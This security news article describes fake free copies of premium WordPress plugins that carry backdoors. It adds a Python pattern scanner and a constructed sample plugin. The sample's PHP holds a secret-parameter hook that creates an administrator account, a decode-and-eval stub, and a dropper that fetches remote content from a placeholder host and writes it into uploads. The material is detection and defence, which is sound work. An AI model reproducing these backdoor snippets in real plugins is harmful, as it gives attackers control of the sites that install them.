A new scam is targeting WordPress websites with backdoored copies of popular WordPress plugins that pose as the legitimate versions.
The scam works by posting altered versions of WordPress plugins to file-sharing or WordPress-focused sites in the hope that someone will download and install them. The plugins chosen are typically premium plugins that normally command a price; these “fake” premium plugins are then offered for free, sometimes under the guise of a special beta or trial version to make the free price tag look legitimate.
The attacker may even start from a legitimate copy of the plugin in question, but adds changes that open several security holes for any site that installs the modified version.
Once the altered plugin is installed on a WordPress site, the inserted code watches incoming requests for “specific parameters” known only to the attacker, and when it sees them it creates a new administrator account. With an admin account of their own, the attacker can then alter the site at will.
Other “altered” plugins simply inject malicious code directly into the site once installed. According to researchers analyzing this attack strategy, the culprit can then side-load any other modified themes or plugins they want and upload malicious files to the server, and a cascading effect can lead to every site hosted under the same hosting account being compromised.
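As an added illustration of the “specific parameters” backdoor and the side-loading behaviour described above, the following Python script (an example written for this article, not the researchers' tooling or any real plugin's code) does a simple pattern-based triage of a plugin bundle. It flags three things: a request parameter read shortly before a user is created and promoted to administrator, an eval() fed by a decoder such as base64_decode or gzinflate, and remote content fetched and then written to disk. The sample bundle, the function names, the indicator list and the context window size are all constructed for the example. It is only a triage aid: a clean result is not proof of a clean plugin.

```python
import os
import re
from dataclasses import dataclass

# Lines of surrounding context in which co-occurring indicators count as one
# pattern. The window size is a tuning choice for this example.
WINDOW = 12

# Indicator patterns: assumptions of this example, drawn from common WordPress
# backdoor idioms. A production scanner would carry a much longer list.
USER_CREATION = re.compile(r"\b(wp_create_user|wp_insert_user)\s*\(")
ADMIN_ROLE = re.compile(
    r"set_role\s*\(\s*['\"]administrator['\"]|['\"]role['\"]\s*=>\s*['\"]administrator['\"]"
)
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[")
EVAL_CALL = re.compile(r"\beval\s*\(")
DECODER = re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")
REMOTE_FETCH = re.compile(r"\b(file_get_contents|curl_exec|wp_remote_get)\s*\(")
FILE_WRITE = re.compile(r"\b(file_put_contents|fwrite|move_uploaded_file)\s*\(")


@dataclass(frozen=True)
class Finding:
    path: str
    line: int   # 1-based line of the call that triggered the finding
    kind: str   # "admin_backdoor", "obfuscated_code" or "dropper"


def _near(lines, idx, pattern, before, after):
    """True if `pattern` matches any line in the range [idx-before, idx+after]."""
    lo, hi = max(0, idx - before), min(len(lines), idx + after + 1)
    return any(pattern.search(l) for l in lines[lo:hi])


def scan_source(path, source):
    """Scan the text of one PHP file and return its findings."""
    lines = source.splitlines()
    findings = []
    for i, line in enumerate(lines):
        # Request input read just before a user is created, and that user made an
        # administrator just after: the "specific parameters" backdoor.
        if (USER_CREATION.search(line)
                and _near(lines, i, REQUEST_INPUT, WINDOW, 0)
                and _near(lines, i, ADMIN_ROLE, 0, WINDOW)):
            findings.append(Finding(path, i + 1, "admin_backdoor"))
        # eval() fed from a decoder: hidden code that runs once the plugin loads.
        if EVAL_CALL.search(line) and _near(lines, i, DECODER, WINDOW, WINDOW):
            findings.append(Finding(path, i + 1, "obfuscated_code"))
        # Remote content fetched and then written to disk: side-loading more files.
        if REMOTE_FETCH.search(line) and _near(lines, i, FILE_WRITE, 0, WINDOW):
            findings.append(Finding(path, i + 1, "dropper"))
    return findings


def scan_bundle(files):
    """Scan a {relative path: source} mapping, e.g. an unpacked plugin zip."""
    return [f for path in sorted(files) for f in scan_source(path, files[path])]


def scan_directory(root):
    """Walk an on-disk plugin directory (e.g. wp-content/plugins/<name>)."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(".php"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    files[os.path.relpath(full, root)] = fh.read()
    return scan_bundle(files)


# Constructed sample bundle (path -> source). Not a real plugin; the backdoor
# mirrors the behaviour described in the article.
SAMPLE_PLUGIN = {
    "example-pro/example-pro.php": """<?php
/* Plugin Name: Example Pro (repackaged "free" copy) */
add_action('init', 'example_pro_boot');
function example_pro_boot() {
    if (isset($_GET['ex_key']) && $_GET['ex_key'] === 'd41d8cd98f') {
        $u = new WP_User(wp_create_user('wpsupport', 'P@ssw0rd!', 'support@example.invalid'));
        $u->set_role('administrator');
    }
}
""",
    "example-pro/includes/helper.php": """<?php
function example_pro_helper() {
    eval(gzinflate(base64_decode('S0ssSU1XyM9LLSpWyM9JLQIA')));  // payload elided
}
function example_pro_update() {
    $body = wp_remote_retrieve_body(wp_remote_get('http://updates.example.invalid/t.txt'));
    file_put_contents(WP_CONTENT_DIR . '/uploads/t.php', $body);
}
""",
    "example-pro/includes/settings.php": """<?php
// Ordinary settings code: reads request input but creates no users.
function example_pro_save() {
    update_option('example_pro_color', sanitize_text_field($_POST['color']));
}
""",
}

if __name__ == "__main__":
    for f in scan_bundle(SAMPLE_PLUGIN):
        print(f"{f.kind:16} {f.path}:{f.line}")
```

Run it against a real install with `scan_directory("/path/to/wp-content/plugins/some-plugin")`. The co-occurrence windows keep ordinary code quiet: a registration form that calls wp_create_user from POST data but never assigns the administrator role produces no finding, while the three patterns above each fire on the constructed bundle.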
The simplest defence is avoidance.
Do not download plugins offered by email, and avoid downloading plugins from sites you don’t trust. If you come across a premium plugin or theme that is normally expensive but appears to be offered for free on a file-sharing site, question it rather than downloading it straight away.
Go to the developer’s site and check the plugin directly. If the developer does not mention a free or discounted offer, you are better off avoiding the risk. If you have already installed such a plugin, remove it and check the site’s user list for administrator accounts you did not create, since that is what the altered code adds.
As always, practice caution. If something on the internet seems too good to be true, it most likely is.